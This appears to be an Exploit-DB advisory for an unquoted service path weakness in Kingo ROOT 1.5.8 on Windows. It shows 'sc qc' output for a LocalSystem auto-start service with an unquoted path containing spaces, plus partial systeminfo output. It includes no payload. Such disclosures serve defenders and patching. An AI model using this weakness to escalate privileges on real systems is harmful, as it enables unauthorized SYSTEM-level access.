Kingo ROOT 1.5.8 - Unquoted Service Path

EDB-ID:

51707

CVE:

N/A




Platform:

Windows

Date:

2023-09-04


#Exploit Title: Kingo ROOT 1.5.8 - Unquoted Service Path
#Date: 8/22/2023
#Exploit Author: Anish Feroz (ZEROXINN)
#Vendor Homepage: https://www.kingoapp.com/
#Software Link: https://www.kingoapp.com/android-root/download.htm
#Version: 1.5.8.3353
#Tested on: Windows 10 Pro

-------------Discovering Unquoted Path--------------

C:\Users\Anish>sc qc KingoSoftService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: KingoSoftService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\Usman\AppData\Local\Kingosoft\Kingo Root\update_27205\bin\KingoSoftService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : KingoSoftService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\Anish>systeminfo

Host Name:                 DESKTOP-UT7E7CF
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19045 N/A Build 19045